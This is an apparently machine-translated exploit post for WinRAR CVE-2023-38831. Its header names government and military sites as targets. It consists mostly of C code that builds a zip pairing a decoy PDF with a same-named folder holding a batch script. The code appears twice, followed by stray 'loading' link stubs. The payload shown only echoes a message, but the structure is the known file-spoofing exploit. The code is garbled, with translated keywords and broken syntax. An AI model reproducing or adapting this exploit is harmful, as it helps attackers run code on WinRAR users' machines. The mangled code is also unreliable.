##########
#利用标题: Exploit Winrar版本6.22漏洞CVE-2023-38831#
##
#作者: e1.coders#
##
#联系: e1.coders [at]邮件[dot] ru#
##
#安全风险:高#
##
#描述:所有目标的政府军事网站#
##
##########
##
#expl0its:#
#include stdio.h
#include stdlib.h
#include string.h
#include'zip.h'
#define pdf_file'document.pdf'
#define folder_name'document.pdf \\'
#define script_file'script.bat'
#define zip_file'exploit.zip'
int main(void){
zipfile zf=zipopen(zip_file,append_status_create);
如果(zf==null){
printf('错误打开zip文件\ n');
返回-1;
}
zip_fileinfo Zfi;
memset(ZFI,0,sizeof(ZFI));
if(zipopennewfileinzip(zf,pdf_file,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将pdf文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
文件*fp=fopen(pdf_file,'rb');
如果(fp==null){
printf('错误打开PDF文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
char缓冲区[1024];
int bytes_read;
while(((bytes_read=fread(buffer,1,sizeof(buffer),fp),fp))0){
if(zipwriteinfileinzip(zf,buffer,bytes_read)0){
printf('错误将pdf文件写入zip文件\ n');
fclose(fp);
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
}
fclose(fp);
Zipclosefileinzip(ZF);
if(zipopennewfileinzip(zf,folder_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将文件夹添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
Zipclosefileinzip(ZF);
char script_name [256];
sprintf(script_name,'%s%s',folder_name,script_file);
if(zipopennewfileinzip(zf,script_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将脚本文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
char script_content []='@echo off \ nstart cmd /c \'echo,您已被cve-2023-38831暂停\'\ n';
if(zipwriteinfileinzip(zf,script_content,strlen(script_content))0){
printf('将脚本文件写入zip文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
Zipclosefileinzip(ZF);
zipclose(ZF,null);
printf('zip文件成功创建\ n');
返回0;
}
https://hdce.medium.com/cve-2023-38831-winrar- Zero-Zero-Zero-Zero-day-poses-new-fisks-for-traders-684911befad2
#利用标题: Exploit Winrar版本6.22漏洞CVE-2023-38831#
##
#作者: e1.coders#
##
#联系: e1.coders [at]邮件[dot] ru#
##
#安全风险:高#
##
#描述:所有目标的政府军事网站#
##
##########
##
#expl0its:#
#include stdio.h
#include stdlib.h
#include string.h
#include'zip.h'
#define pdf_file'document.pdf'
#define folder_name'document.pdf \\'
#define script_file'script.bat'
#define zip_file'exploit.zip'
int main(void){
zipfile zf=zipopen(zip_file,append_status_create);
如果(zf==null){
printf('错误打开zip文件\ n');
返回-1;
}
zip_fileinfo Zfi;
memset(ZFI,0,sizeof(ZFI));
if(zipopennewfileinzip(zf,pdf_file,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将pdf文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
文件*fp=fopen(pdf_file,'rb');
如果(fp==null){
printf('错误打开PDF文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
char缓冲区[1024];
int bytes_read;
while(((bytes_read=fread(buffer,1,sizeof(buffer),fp),fp))0){
if(zipwriteinfileinzip(zf,buffer,bytes_read)0){
printf('错误将pdf文件写入zip文件\ n');
fclose(fp);
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
}
fclose(fp);
Zipclosefileinzip(ZF);
if(zipopennewfileinzip(zf,folder_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将文件夹添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
Zipclosefileinzip(ZF);
char script_name [256];
sprintf(script_name,'%s%s',folder_name,script_file);
if(zipopennewfileinzip(zf,script_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将脚本文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
char script_content []='@echo off \ nstart cmd /c \'echo,您已被cve-2023-38831暂停\'\ n';
if(zipwriteinfileinzip(zf,script_content,strlen(script_content))0){
printf('将脚本文件写入zip文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
Zipclosefileinzip(ZF);
zipclose(ZF,null);
printf('zip文件成功创建\ n');
返回0;
}
正在加载...
nvd.nist.gov
正在加载...
nvd.nist.gov
正在加载...
github.com
正在加载...
www.cvedetails.com
正在加载...
www.logpoint.com
正在加载...
www.microsoft.com
正在加载...
packetstormscurity.com
正在加载...
blog.google
正在加载...
news.ycombinator.com
正在加载...
www.bleepingcomputer.com
正在加载...
www.group-ib.com